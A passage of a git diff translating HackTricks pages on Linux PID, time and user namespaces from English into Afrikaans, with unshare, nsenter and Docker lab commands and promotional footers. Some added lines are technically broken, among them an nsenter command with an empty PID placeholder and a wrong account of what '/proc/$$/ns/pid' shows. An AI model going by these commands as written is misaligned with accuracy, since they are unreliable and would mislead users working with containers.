[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -The PID (Process IDentifier) namespace is a feature in the Linux kernel that provides process isolation by enabling a group of processes to have their own set of unique PIDs, separate from the PIDs in other namespaces. This is particularly useful in containerization, where process isolation is essential for security and resource management. +Die PID (Process IDentifier) naamruimte is 'n kenmerk in die Linux-kernel wat proses-isolasie bied deur 'n groep prosesse te voorsien van hul eie stel unieke PIDs, afsonderlik van die PIDs in ander naamruimtes. Dit is veral nuttig in konteinering, waar proses-isolasie noodsaaklik is vir sekuriteit en hulpbronbestuur. -When a new PID namespace is created, the first process in that namespace is assigned PID 1. This process becomes the "init" process of the new namespace and is responsible for managing other processes within the namespace. Each subsequent process created within the namespace will have a unique PID within that namespace, and these PIDs will be independent of PIDs in other namespaces. +Wanneer 'n nuwe PID-naamruimte geskep word, word die eerste proses in daardie naamruimte toegewys aan PID 1. Hierdie proses word die "init" proses van die nuwe naamruimte en is verantwoordelik vir die bestuur van ander prosesse binne die naamruimte. Elke volgende proses wat binne die naamruimte geskep word, sal 'n unieke PID binne daardie naamruimte hê, en hierdie PIDs sal onafhanklik wees van PIDs in ander naamruimtes. -From the perspective of a process within a PID namespace, it can only see other processes in the same namespace. It is not aware of processes in other namespaces, and it cannot interact with them using traditional process management tools (e.g., `kill`, `wait`, etc.). This provides a level of isolation that helps prevent processes from interfering with one another. +Vanuit die perspektief van 'n proses binne 'n PID-naamruimte kan dit slegs ander prosesse in dieselfde naamruimte sien. Dit is nie bewus van prosesse in ander naamruimtes nie, en dit kan nie met hulle interaksie hê deur gebruik te maak van tradisionele prosesbestuurstelsels (bv. `kill`, `wait`, ens.). Dit bied 'n vlak van isolasie wat help voorkom dat prosesse mekaar versteur. -### How it works: +### Hoe dit werk: -1. When a new process is created (e.g., by using the `clone()` system call), the process can be assigned to a new or existing PID namespace. **If a new namespace is created, the process becomes the "init" process of that namespace**. -2. The **kernel** maintains a **mapping between the PIDs in the new namespace and the corresponding PIDs** in the parent namespace (i.e., the namespace from which the new namespace was created). This mapping **allows the kernel to translate PIDs when necessary**, such as when sending signals between processes in different namespaces. -3. **Processes within a PID namespace can only see and interact with other processes in the same namespace**. They are not aware of processes in other namespaces, and their PIDs are unique within their namespace. -4. When a **PID namespace is destroyed** (e.g., when the "init" process of the namespace exits), **all processes within that namespace are terminated**. This ensures that all resources associated with the namespace are properly cleaned up. +1. Wanneer 'n nuwe proses geskep word (bv. deur die `clone()` stelseloproep te gebruik), kan die proses toegewys word aan 'n nuwe of bestaande PID-naamruimte. **As 'n nuwe naamruimte geskep word, word die proses die "init" proses van daardie naamruimte**. +2. Die **kernel** handhaaf 'n **koppeling tussen die PIDs in die nuwe naamruimte en die ooreenstemmende PIDs** in die ouer-naamruimte (dit wil sê die naamruimte waaruit die nuwe naamruimte geskep is). Hierdie koppeling **stel die kernel in staat om PIDs te vertaal wanneer dit nodig is**, soos wanneer seine tussen prosesse in verskillende naamruimtes gestuur word. +3. **Prosesse binne 'n PID-naamruimte kan slegs ander prosesse in dieselfde naamruimte sien en daarmee interaksie hê**. Hulle is nie bewus van prosesse in ander naamruimtes nie, en hul PIDs is uniek binne hul naamruimte. +4. Wanneer 'n **PID-naamruimte vernietig word** (bv. wanneer die "init" proses van die naamruimte afsluit), **word alle prosesse binne daardie naamruimte beëindig**. Dit verseker dat alle hulpbronne wat met die naamruimte verband hou, behoorlik skoongemaak word. -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Naamruimtes #### CLI - ```bash sudo unshare -pf --mount-proc /bin/bash ``` -
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f` opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Process ID) namespaces hanteer. Die sleutelbesonderhede en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare` stelseloproep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare" proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weeskindprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING` vlag. Dit veroorsaak dat die `alloc_pid`-funksie nie 'n nuwe PID kan toeken wanneer 'n nuwe proses geskep word nie, wat die "Kan nie geheue toewys nie" fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f` opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die vroeë afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +Deur te verseker dat `unshare` met die `-f` vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
-By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe bergnamespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het. #### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +### Kyk watter namespace jou proses in is -### Check which namespace are your process in +Om te bepaal in watter namespace jou proses tans is, kan jy die volgende opdrag gebruik: +```bash +cat /proc/$$/status | grep NSpid +``` + +Hierdie opdrag sal die PID (Process ID) van die proses toon, tesame met die namespace waarin dit bestaan. ```bash ls -l /proc/self/ns/pid lrwxrwxrwx 1 root root 0 Apr 3 18:45 /proc/self/ns/pid -> 'pid:[4026532412]' ``` - -### Find all PID namespaces +### Vind alle PID-ruimtes {% code overflow="wrap" %} ```bash @@ -84,31 +86,29 @@ sudo find /proc -maxdepth 3 -type l -name pid -exec readlink {} \; 2>/dev/null | ``` {% endcode %} -Note that the root use from the initial (default) PID namespace can see all the processes, even the ones in new PID names paces, thats why we can see all the PID namespaces. - -### Enter inside a PID namespace +Let daarop dat die root-gebruiker van die aanvanklike (standaard) PID-naamruimte al die prosesse kan sien, selfs diegene in nuwe PID-naamruimtes. Dit is hoekom ons al die PID-naamruimtes kan sien. +### Betree 'n PID-naamruimte ```bash nsenter -t TARGET_PID --pid /bin/bash ``` +Wanneer jy binne 'n PID-namespace gaan vanaf die verstek-namespace, sal jy steeds al die prosesse kan sien. En die proses van daardie PID-ns sal die nuwe bash op die PID-ns kan sien. -When you enter inside a PID namespace from the default namespace, you will still be able to see all the processes. And the process from that PID ns will be able to see the new bash on the PID ns. +Jy kan ook slegs **binne 'n ander proses-PID-namespace gaan as jy root is**. En jy **kan nie** **binne** 'n ander namespace **ingaan sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/pid`) -Also, you can only **enter in another process PID namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/pid`) - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md index d37ca7413..6a07cd803 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md @@ -1,71 +1,73 @@ -# Time Namespace +# Tyd-Namespace
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -The time namespace in Linux allows for per-namespace offsets to the system monotonic and boot-time clocks. It is commonly used in Linux containers to change the date/time within a container and adjust clocks after restoring from a checkpoint or snapshot. +Die tyd-namespace in Linux maak dit moontlik om per-namespace verskuiwings na die stelsel se monotone en opstarttydklokke te hê. Dit word algemeen gebruik in Linux-houers om die datum/tyd binne 'n houer te verander en klokke aan te pas nadat dit van 'n kontrolepunt of afskakeling herstel is. -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Namespaces #### CLI - ```bash sudo unshare -T [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID) namespaces hanteer. Die sleuteldetails en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-stelseloproep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weeskindprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie misluk om 'n nuwe PID toe te ken wanneer 'n nuwe proses geskep word, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. +Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +### Kyk watter namespace jou proses in is -### Check which namespace is your process in +Om te bepaal in watter namespace jou proses tans is, kan jy die volgende opdrag gebruik: +```bash +cat /proc/$$/ns/pid +``` + +Hier is 'pid' die identifikasienommer van die proses waarvoor jy die namespace wil bepaal. ```bash ls -l /proc/self/ns/time lrwxrwxrwx 1 root root 0 Apr 4 21:16 /proc/self/ns/time -> 'time:[4026531834]' ``` - -### Find all Time namespaces +### Vind alle Tyd namespaces {% code overflow="wrap" %} ```bash @@ -75,29 +77,39 @@ sudo find /proc -maxdepth 3 -type l -name time -exec ls -l {} \; 2>/dev/null | ``` {% endcode %} -### Enter inside a Time namespace +### Betree binne 'n Tyd-namespace +Om binne 'n Tyd-namespace in te gaan, kan jy die volgende stappe volg: + +1. Identifiseer die PID van die proses waarin jy wil binnekom. +2. Voer die volgende opdrag uit om die proses binne die Tyd-namespace te betree: + +```bash +nsenter --time=/proc//ns/time /bin/bash +``` + +Vervang `` met die regte proses-ID. + +Nadat jy die opdrag uitgevoer het, sal jy binne die Tyd-namespace wees en kan jy die funksies en hulpbronne binne daardie namespace manipuleer. ```bash nsenter -T TARGET_PID --pid /bin/bash ``` +Verder kan jy slegs **toegang verkry tot 'n ander proses-namespace as jy root is**. En jy **kan nie** **toegang kry** tot 'n ander namespace **sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/net`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/net`). - - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory) * [https://www.phoronix.com/news/Linux-Time-Namespace-Coming](https://www.phoronix.com/news/Linux-Time-Namespace-Coming)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md index fc3a839a1..a8197ceb5 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md @@ -1,96 +1,86 @@ -# User Namespace +# Gebruikersnaamruimte
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -A user namespace is a Linux kernel feature that **provides isolation of user and group ID mappings**, allowing each user namespace to have its **own set of user and group IDs**. This isolation enables processes running in different user namespaces to **have different privileges and ownership**, even if they share the same user and group IDs numerically. +'n Gebruikersnaamruimte is 'n Linux-kernelkenmerk wat **afsondering van gebruikers- en groep-ID-toewysings bied**, wat elke gebruikersnaamruimte in staat stel om sy **eie stel gebruikers- en groep-ID's** te hê. Hierdie afsondering maak dit moontlik dat prosesse wat in verskillende gebruikersnaamruimtes loop, **verskillende voorregte en eienaarskap het**, selfs as hulle dieselfde gebruikers- en groep-ID's numeries deel. -User namespaces are particularly useful in containerization, where each container should have its own independent set of user and group IDs, allowing for better security and isolation between containers and the host system. +Gebruikersnaamruimtes is veral nuttig in konteinering, waar elke kontainer sy eie onafhanklike stel gebruikers- en groep-ID's moet hê, wat beter sekuriteit en afsondering tussen konteinere en die gasheerstelsel moontlik maak. -### How it works: +### Hoe dit werk: -1. When a new user namespace is created, it **starts with an empty set of user and group ID mappings**. This means that any process running in the new user namespace will **initially have no privileges outside of the namespace**. -2. ID mappings can be established between the user and group IDs in the new namespace and those in the parent (or host) namespace. This **allows processes in the new namespace to have privileges and ownership corresponding to user and group IDs in the parent namespace**. However, the ID mappings can be restricted to specific ranges and subsets of IDs, allowing for fine-grained control over the privileges granted to processes in the new namespace. -3. Within a user namespace, **processes can have full root privileges (UID 0) for operations inside the namespace**, while still having limited privileges outside the namespace. This allows **containers to run with root-like capabilities within their own namespace without having full root privileges on the host system**. -4. Processes can move between namespaces using the `setns()` system call or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWUSER` flag. When a process moves to a new namespace or creates one, it will start using the user and group ID mappings associated with that namespace. +1. Wanneer 'n nuwe gebruikersnaamruimte geskep word, **begin dit met 'n leë stel gebruikers- en groep-ID-toewysings**. Dit beteken dat enige proses wat in die nuwe gebruikersnaamruimte loop, **aanvanklik geen voorregte buite die naamruimte het nie**. +2. ID-toewysings kan tot stand gebring word tussen die gebruikers- en groep-ID's in die nuwe naamruimte en dié in die ouer (of gasheer) naamruimte. Dit **maak dit moontlik dat prosesse in die nuwe naamruimte voorregte en eienaarskap het wat ooreenstem met die gebruikers- en groep-ID's in die ouer naamruimte**. Die ID-toewysings kan egter beperk word tot spesifieke reekse en subsets van ID's, wat fynbeheerde beheer oor die voorregte wat aan prosesse in die nuwe naamruimte verleen word, moontlik maak. +3. Binne 'n gebruikersnaamruimte kan **prosesse volle root-voorregte (UID 0) hê vir operasies binne die naamruimte**, terwyl hulle steeds beperkte voorregte buite die naamruimte het. Dit maak dit moontlik dat **konteinere met root-agtige vermoëns binne hul eie naamruimte kan loop sonder om volle root-voorregte op die gasheerstelsel te hê**. +4. Prosesse kan tussen naamruimtes beweeg deur die `setns()`-sisteemaanroep te gebruik of nuwe naamruimtes te skep deur die `unshare()`- of `clone()`-sisteemaanroep met die `CLONE_NEWUSER`-vlag te gebruik. Wanneer 'n proses na 'n nuwe naamruimte beweeg of een skep, begin dit die gebruikers- en groep-ID-toewysings wat met daardie naamruimte geassosieer is, gebruik. -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Naamruimtes #### CLI - ```bash sudo unshare -U [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID) namespaces hanteer. Die sleuteldetails en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-stelseloproep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weeskindprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie misluk om 'n nuwe PID toe te ken wanneer 'n nuwe proses geskep word, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new 